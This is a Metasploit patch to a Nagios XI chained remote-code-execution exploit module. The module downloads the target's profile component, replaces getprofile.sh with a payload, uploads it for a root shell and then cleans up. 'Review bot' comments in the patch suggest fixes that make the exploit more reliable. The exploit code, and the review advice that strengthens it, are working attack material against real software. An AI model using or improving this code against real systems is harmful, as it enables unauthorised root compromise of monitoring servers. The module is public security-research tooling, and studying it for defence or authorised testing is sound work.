From 9663f88fdc991f7e407ed3576fffec5ee8175e31 Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 30 Jun 2016 23:07:04 -0500 Subject: [PATCH] Download profile.zip instead of including it profile.zip is GPL-licensed... --- data/exploits/nagios_xi/profile.zip | Bin 5511 -> 0 bytes data/exploits/nagios_xi/profile/CHANGES.txt | 9 - data/exploits/nagios_xi/profile/getprofile.sh | 64 ---- .../nagios_xi/profile/profile.inc.php | 106 ------- data/exploits/nagios_xi/profile/profile.php | 298 ------------------ .../linux/http/nagios_xi_chained_rce.rb | 101 ++++-- 6 files changed, 67 insertions(+), 511 deletions(-) delete mode 100644 data/exploits/nagios_xi/profile.zip delete mode 100644 data/exploits/nagios_xi/profile/CHANGES.txt delete mode 100644 data/exploits/nagios_xi/profile/getprofile.sh delete mode 100644 data/exploits/nagios_xi/profile/profile.inc.php delete mode 100644 data/exploits/nagios_xi/profile/profile.php 
diff --git a/data/exploits/nagios_xi/profile.zip b/data/exploits/nagios_xi/profile.zip deleted file mode 100644 index 1f51d7f49c28b9cfea5e642be36dfe703042c6ca..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 5511 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 b_P?@H2V-FV{8RwO&*KyY0C@G6f(rN_@9ze6 diff --git a/data/exploits/nagios_xi/profile/CHANGES.txt b/data/exploits/nagios_xi/profile/CHANGES.txt deleted file mode 100644 index e3eabb5fd6..0000000000 --- a/data/exploits/nagios_xi/profile/CHANGES.txt +++ /dev/null @@ -1,9 +0,0 @@ -02-19-2013 1.2 ------------- -- Added New functionality to download LOG files and latest snapshots in a zip for support. - SL -- Added ps -aef to the log list - SL - - -08-28-2012 1.1 ----------- -- Added XI Version -SW diff --git a/data/exploits/nagios_xi/profile/getprofile.sh b/data/exploits/nagios_xi/profile/getprofile.sh deleted file mode 100644 index a2ccb60732..0000000000 --- a/data/exploits/nagios_xi/profile/getprofile.sh +++ /dev/null 
@@ -1,64 +0,0 @@ -#!/bin/bash - - -echo "-------------------Fetching Information-------------------" - -echo "Please wait......." - -tail -100 /usr/local/nagios/var/nagios.log &> /usr/local/nagiosxi/var/components/profile/nagios.txt; - -echo "Creating nagios.txt..."; - -tail -100 /usr/local/nagios/var/perfdata.log &> /usr/local/nagiosxi/var/components/profile/perfdata.txt; - -echo "Creating perfdata.txt..."; - -tail -100 /usr/local/nagios/var/npcd.log &> /usr/local/nagiosxi/var/components/profile/npcd.txt; - -echo "Creating npcd.txt..."; - -tail -100 /usr/local/nagiosxi/var/cmdsubsys.log > /usr/local/nagiosxi/var/components/profile/cmdsubsys.txt; - -echo "Creating cmdsubsys.txt..."; - -tail -100 /usr/local/nagiosxi/var/eventman.log > /usr/local/nagiosxi/var/components/profile/eventman.txt; - -echo "Creating eventman.txt..."; - -############ We'll need a sudoers rule for these, only root can read them - -#tail -100 /var/log/messages > /usr/local/nagiosxi/var/components/profile/systemlog.txt; - -#echo "Creating systemlog.txt..."; - -#tail -100 /var/log/httpd/error_log > /usr/local/nagiosxi/var/components/profile/apacheerrors.txt; - -#echo "Creating apacheerrors.txt..."; - -#tail -100 /var/log/mysqld.log > /usr/local/nagiosxi/var/components/profile/mysqllog.txt; - -#echo "Creating mysqllog.txt..."; - -df -h > /usr/local/nagiosxi/var/components/profile/filesystem.txt; - -echo "Creating filesystem.txt..."; - -ps -aef > /usr/local/nagiosxi/var/components/profile/psaef.txt; - -echo "Dumping PS - AEF to psaef.txt..."; - -top -b -n 1 > /usr/local/nagiosxi/var/components/profile/top.txt; - -echo "Creating top log..."; - -FILE=$(ls /usr/local/nagiosxi/nom/checkpoints/nagioscore/ | sort -n -t _ -k 2 | grep .gz | tail -1); cp /usr/local/nagiosxi/nom/checkpoints/nagioscore/$FILE /usr/local/nagiosxi/var/components/profile/; - -echo "Adding latest snapshot to: `pwd`" - -## temporarily change to that directory, zip, then leave -( - cd /usr/local/nagiosxi/var/components/ && zip -r 
profile.zip profile -) -echo "Zipping logs directory..."; - -echo "Backup and Zip complete!"; diff --git a/data/exploits/nagios_xi/profile/profile.inc.php b/data/exploits/nagios_xi/profile/profile.inc.php deleted file mode 100644 index 1a20358e90..0000000000 --- a/data/exploits/nagios_xi/profile/profile.inc.php +++ /dev/null 
@@ -1,106 +0,0 @@ -".gettext("Error: This component requires Nagios XI 20011R1.1 or later.").""; - - //all components require a few arguments to be initialized correctly. - $args=array( - - // need a name - COMPONENT_NAME => $profile_component_name, - COMPONENT_VERSION => '1.1', - COMPONENT_DATE => '8/28/2012', - - // informative information - COMPONENT_AUTHOR => "Nagios Enterprises, LLC", - COMPONENT_DESCRIPTION => $desc, - COMPONENT_TITLE => "System Profile", - - ); - - //register this component with XI - register_component($profile_component_name,$args); - - // register the addmenu function - if($versionok) - register_callback(CALLBACK_MENUS_INITIALIZED,'profile_component_addmenu'); - } - - - - -/////////////////////////////////////////////////////////////////////////////////////////// -// MISC FUNCTIONS -/////////////////////////////////////////////////////////////////////////////////////////// - -function profile_component_checkversion(){ - - if(!function_exists('get_product_release')) - return false; - //requires greater than 2011R1 - if(get_product_release()<201) - return false; - - return true; - } - -function profile_component_addmenu($arg=null){ - global $profile_component_name; - //retrieve the URL for this component - $urlbase=get_component_url_base($profile_component_name); - //figure out where I'm going on the menu - $mi=find_menu_item(MENU_ADMIN,"menu-admin-managesystemconfig","id"); - if($mi==null) //bail if I didn't find the above menu item - return; - - $order=grab_array_var($mi,"order",""); //extract this variable from the $mi array - if($order=="") - return; - - $neworder=$order+0.1; //determine my menu order - - //add this to the main home menu - add_menu_item(MENU_ADMIN,array( - "type" => "link", - "title" => "System Profile", - "id" => "menu-admin-profile", - "order" => $neworder, - "opts" => array( - //this is the page the menu will actually point to. 
- //all of my actual component workings will happen on this script - "href" => $urlbase."/profile.php", - ) - )); - - } - - -?> \ No newline at end of file diff --git a/data/exploits/nagios_xi/profile/profile.php b/data/exploits/nagios_xi/profile/profile.php deleted file mode 100644 index 21b917c311..0000000000 --- a/data/exploits/nagios_xi/profile/profile.php +++ /dev/null @@ -1,298 +0,0 @@ - tags with newlines - $tags = array('

','

','
','
','
','
'); - $nls = array("\n====","====\n\n","\n===","====\n\n","\n\n","\n\n"); - $content= str_replace($tags,$nls,$content); - //return $content; - } - } - -} - -function build_profile_output($text) { - global $content; - - $content .= "

Nagios XI Installation Profile

"; - - if(!$text) { - $content .="
"; - $content .=" Download Profile"; - $content .="
"; - } - - //SYSTEM - show_system_settings(); - - - - //SERVER INFO - show_apache_settings(); - - //TIME STUFF - show_time_settings(); - - //XI Specific Data - show_xi_info(); - - //subsystem calls - run_subsystem_tests(); - - -} - - - -function show_system_settings() { - - global $content; - - $profile = php_uname('n'); - $profile .= ' '.php_uname('r'); - $profile .= ' '.php_uname('m'); - exec('which gnome-session',$output,$gnome); - - $content .= "
System:
"; - $content .= "Nagios XI Version : ".get_product_version()."\n"; - $content .= "$profile\n"; - //detect distro and version - $file = @file_get_contents('/etc/redhat-release'); - if(!$file) - $file = @file_get_contents('/etc/fedora-release'); - if(!$file) - $file = @file_get_contents('/etc/lsb-release'); - - $content .= $file; - $content .= ($gnome > 0) ? "Gnome is not installed\n" : " Gnome Installed\n"; - - if(check_for_proxy()) $content.= "Proxy appears to be in use\n"; - -} - - -function show_apache_settings() -{ - global $content; - - $content .= "
Apache Information
"; - $content .= "PHP Version: ".PHP_VERSION."\n"; - $content .= "Agent: ".$_SERVER['HTTP_USER_AGENT']."\n"; - $content .= "Server Name: ".$_SERVER['SERVER_NAME']."\n"; - $content .= "Server Address: ".$_SERVER['SERVER_ADDR']."\n"; - $content .= "Server Port: ".$_SERVER['SERVER_PORT']."\n"; -} - - -function show_time_settings() { - - global $content; - - $php_tz = (ini_get('date.timezone') == '') ? 'Not set' : ini_get('date.timezone'); - $content .= "
Date/Time
"; - $content .= "PHP Timezone: $php_tz \n"; - $content .= "PHP Time: ".date('r')."\n"; - $content .= "System Time: ".exec('/bin/date -R')."\n"; - -} - - -function show_xi_info() { - global $content; - - //systats - $xml = get_xml_sysstat_data(); - $statdata = ''; - //daemons - foreach($xml->daemons->daemon as $d) { - $statdata .= "{$d->output}\n"; - } - //hostcount - $result = (exec_sql_query(DB_NDOUTILS,"SELECT COUNT(*) FROM nagios_hosts")); - foreach($result as $r) $hostcount = $r[0]; - //servicecount - $result = exec_sql_query(DB_NDOUTILS,"SELECT COUNT(*) FROM nagios_services"); - foreach($result as $r) $servicecount = $r[0]; - //add to statdata string - $statdata .= "CPU Load 15: {$xml->load->load15} \n"; - $statdata .= "Total Hosts: $hostcount \n"; - $statdata .= "Total Services: $servicecount \n"; - - //content output - $content .= "
Nagios XI Data
"; - $content .= $statdata; - //url reference calls - $content .= "Function 'get_base_uri' returns: ".get_base_uri()."\n"; - $content .= "Function 'get_base_url' returns: ".get_base_url()."\n"; - $content .= "Function 'get_backend_url(internal_call=false)' returns: ".get_backend_url(false)."\n"; - $content .= "Function 'get_backend_url(internal_call=true)' returns: ".get_backend_url(true)."\n"; -} - - - -function check_for_proxy() { - - $proxy = false; - - $f = @fopen('/etc/wgetrc','r'); - if($f) { - while(!feof($f)) { - $line = fgets($f); - if($line[0]=='#') continue; - if(strpos($line,'use_proxy = on')!==FALSE) { - $proxy = true; - break; - } - } - } - - $proxy_env = exec('/bin/echo $http_proxy'); - if(strlen($proxy_env > 0)) $proxy = true; - return $proxy; - -} - - - -function run_subsystem_tests() { - - global $cfg; - global $content; - - //localhost ping resolve - $content .= "
Ping Test localhost
"; - $ping = '/bin/ping -c 3 localhost 2>&1'; - $content .= "Running:
$ping 
"; - $handle = popen($ping,'r'); - while(($buf = fgets($handle, 4096)) !=false) - $content .= $buf; - - pclose($handle); - - //get system info - $https=grab_array_var($cfg,"use_https",false); - $url=($https==true)?"https":"http"; - - //nagiosql resolve - $content .= "
Test wget To locahost
"; - $url.="://localhost".$cfg['component_info']['nagiosql']['direct_url']."/index.php"; - $content .= "WGET From URL: $url \n"; - $content .= "Running:
/usr/bin/wget $url 
"; - $handle = popen("/usr/bin/wget ".$url.' -O /tmp/nagiosql_index.tmp 2>&1', 'r'); - while(($buf = fgets($handle, 4096)) !=false) - $content .= $buf; - - pclose($handle); - -} - -function get_logs_and_snapshot() { - global $content; - //zip logs, latest snapshot, df -h, and top - exec('/bin/mkdir -p /usr/local/nagiosxi/var/components/profile',$output,$code); - - //dump existing profile into file - $profile = build_profile_output(true); - //str_replace tags with newlines - $tags = array('

','

','
','
','
','
'); - $nls = array("\n====","====\n\n","\n===","====\n\n","\n\n","\n\n"); - $content= str_replace($tags,$nls,$content); - file_put_contents('/usr/local/nagiosxi/var/components/profile/profile.txt',$profile); - - //get logs and config snapshot - exec('./getprofile.sh',$output,$code); - - //add sanity checking - if($code > 0 ) { - echo "PROFILE BUILD FAILED
\n"; - echo array_dump($output); //dump output where newlines are html breaks - echo "CODE: $code
"; - exit(); - } - - // zip was packaged, send it to user - $zip="/usr/local/nagiosxi/var/components/profile.zip"; - - //more sanity - if(!file_exists($zip)) { - echo "Failed to retrieve zip file!\n"; - exit(); - } - - //chdir($dir); - - $mime_type="application/zip"; - header('Content-type: '.$mime_type); - header("Content-length: " . filesize($zip)); - header('Content-Disposition: attachment; filename="'.basename($zip).'"'); - $f = file_get_contents($zip,'rb'); - //print binary output to browser - echo $f; - - //remove zip - unlink($zip); - -} -//ob_end_flush(); -?> diff --git a/modules/exploits/linux/http/nagios_xi_chained_rce.rb b/modules/exploits/linux/http/nagios_xi_chained_rce.rb index db52cb6b27..aef21befe8 100644 --- a/modules/exploits/linux/http/nagios_xi_chained_rce.rb +++ b/modules/exploits/linux/http/nagios_xi_chained_rce.rb @@ -76,6 +76,8 @@ class MetasploitModule < Msf::Exploit::Remote print_status('Getting monitored host') get_monitored_host + print_status('Downloading component') + download_profile_component print_status('Uploading root shell') upload_root_shell print_status('Popping shell!') @@ -88,19 +90,22 @@ class MetasploitModule < Msf::Exploit::Remote def on_new_session(session) super + print_status('Cleaning up...') - cleanup_commands.each do |command| + + commands = [ + 'rm -rf ../profile', + 'unzip -qd .. ../../../../tmp/component-profile.zip', + 'chown -R nagios:nagios ../profile', + "rm -f ../../../../tmp/component-#{zip_filename}" + ] + + commands.each do |command| vprint_status(command) session.shell_command_token(command) end end - def cleanup_commands - ["base64 -d<<<#{encoded_getprofile}>../profile/getprofile.sh", - 'touch -r ../profile/{profile.php,getprofile.sh}', - "rm -f ../../../../tmp/component-#{zip_filename}"] - end - # # Exploit methods # 
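Review bot: The new cleanup in on_new_session deletes the live component before it knows the restore archive exists: `rm -rf ../profile` runs first, and `unzip -qd .. ../../../../tmp/component-profile.zip` depends on a `component-profile.zip` in the target's tmp directory that nothing in this commit writes (presumably left behind server-side by the `download=profile` request, since download_profile_component only keeps the body in memory). If that file is absent the original component is gone and the failure is invisible, because the command output is only passed to vprint_status. Running the three restore steps as one guarded command, `'test -f ../../../../tmp/component-profile.zip && rm -rf ../profile && unzip -qd .. ../../../../tmp/component-profile.zip',` keeps a recoverable state, and inspecting the string returned by shell_command_token for unzip errors would make a failed restore visible to the operator. on_new_session is wholly inside this hunk.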
@@ -174,13 +179,38 @@ class MetasploitModule < Msf::Exploit::Remote
 end
 end
 
+ def download_profile_component
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => '/nagiosxi/admin/components.php',
+ 'cookie' => @admin_cookie,
+ 'vars_get' => {
+ 'download' => 'profile'
+ }
+ )
+
+ if res && res.body =~ /^PK\x03\x04/
+ @profile_component = res.body
+ else
+ fail_with(Failure::UnexpectedReply, 'Failed to download component! punt!')
+ end
+ end
+
 def upload_root_shell
+ mime = Rex::MIME::Message.new
+ mime.add_part(@csrf_token, nil, nil, 'form-data; name="nsp"')
+ mime.add_part('1', nil, nil, 'form-data; name="upload"')
+ mime.add_part('1000000', nil, nil, 'form-data; name="MAX_FILE_SIZE"')
+ mime.add_part(payload_zip, 'application/zip', 'binary',
+ 'form-data; name="uploadedfile"; ' \
+ "filename=\"#{zip_filename}\"")
+
 res = send_request_cgi!(
 'method' => 'POST',
 'uri' => '/nagiosxi/admin/components.php',
 'cookie' => @admin_cookie,
- 'ctype' => "multipart/form-data; boundary=#{mime_message.bound}",
- 'data' => mime_message.to_s
+ 'ctype' => "multipart/form-data; boundary=#{mime.bound}",
+ 'data' => mime.to_s
 )
 
 if res && res.code != 200
@@ -192,25 +222,6 @@ class MetasploitModule < Msf::Exploit::Remote
 end
 end
 
- def mime_message
- @mime ||= Rex::MIME::Message.new
- @mime.add_part(@csrf_token, nil, nil, 'form-data; name="nsp"')
- @mime.add_part('1', nil, nil, 'form-data; name="upload"')
- @mime.add_part('1000000', nil, nil, 'form-data; name="MAX_FILE_SIZE"')
- @mime.add_part(payload_zip, 'application/zip', 'binary',
- 'form-data; name="uploadedfile"; ' \
- "filename=\"#{zip_filename}\"")
- @mime
- end
-
- def payload_zip
- zip = Rex::Zip::Archive.new
- zip.add_r(profile_dir)
- zip.entries.delete_if { |e| e.name == 'profile/getprofile.sh' }
- zip.add_file('profile/getprofile.sh', payload.encoded)
- zip.pack
- end
-
 def pop_dat_shell
 send_request_cgi(
 'method' => 'GET',
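Review bot: The archive check in download_profile_component, `if res && res.body =~ /^PK\x03\x04/`, anchors with `^`, which in Ruby matches at the start of any line, so a text or HTML error body that happens to carry the local-file-header bytes after a newline is accepted and later handed to Zip::File.open_buffer in payload_zip; the HTTP status is also never consulted. A whole-string anchor plus a status check matches the intent: `if res && res.code == 200 && res.body.start_with?("PK\x03\x04")`. Including `res.code` in the `'Failed to download component! punt!'` message when res is present would make the failure diagnosable from the console. upload_root_shell's body continues past the end of the first hunk.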
@@ -224,16 +235,38 @@ class MetasploitModule < Msf::Exploit::Remote
 end
 
 #
- # Utility methods
+ # Support methods
 #
 
- def profile_dir
- File.join(Msf::Config.data_directory, 'exploits', 'nagios_xi', 'profile')
+ def payload_zip
+ zip = Rex::Zip::Archive.new
+
+ Zip::File.open_buffer(@profile_component) do |z|
+ z.each do |f|
+ zip.entries << Rex::Zip::Entry.new(
+ f.name,
+ (if f.ftype == :file
+ if f.name == 'profile/getprofile.sh'
+ payload.encoded
+ else
+ z.read(f)
+ end
+ else
+ ''
+ end),
+ Rex::Zip::CM_DEFLATE,
+ nil,
+ (Rex::Zip::EFA_ISDIR if f.ftype == :directory)
+ )
+ end
+ end
+
+ zip.pack
 end
 
- def encoded_getprofile
- Rex::Text.encode_base64(File.read(File.join(profile_dir, 'getprofile.sh')))
- end
+ #
+ # Utility methods
+ #
 
 def zip_filename
 @zip_filename ||= Rex::Text.rand_text_alpha(8) + '.zip'
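Review bot: payload_zip never verifies that an entry named `profile/getprofile.sh` was actually seen, so a downloaded component with a different layout (another top-level directory name, or an entry whose ftype is not `:file`) is repacked untouched and the module uploads an unmodified component while reporting progress as if the swap had happened. Entries that are neither `:file` nor `:directory` (symlinks, for instance) are also silently written back as empty regular files, which changes what the cleanup later restores. Tracking whether the replacement occurred and failing otherwise makes the precondition explicit; the rewrite below keeps the same Rex::Zip::Entry.new arguments and only hoists the data selection. The method also depends on `Zip::File` (rubyzip) being loaded, and nothing in the visible diff adds `require 'zip'`, so that presumably comes from the framework — worth confirming.

```ruby
def payload_zip
  zip = Rex::Zip::Archive.new
  replaced = false

  Zip::File.open_buffer(@profile_component) do |z|
    z.each do |f|
      data =
        if f.ftype != :file
          ''
        elsif f.name == 'profile/getprofile.sh'
          replaced = true
          payload.encoded
        else
          z.read(f)
        end

      zip.entries << Rex::Zip::Entry.new(
        f.name,
        data,
        Rex::Zip::CM_DEFLATE,
        nil,
        (Rex::Zip::EFA_ISDIR if f.ftype == :directory)
      )
    end
  end

  fail_with(Failure::NotFound, 'profile/getprofile.sh not present in downloaded component') unless replaced
  zip.pack
end
```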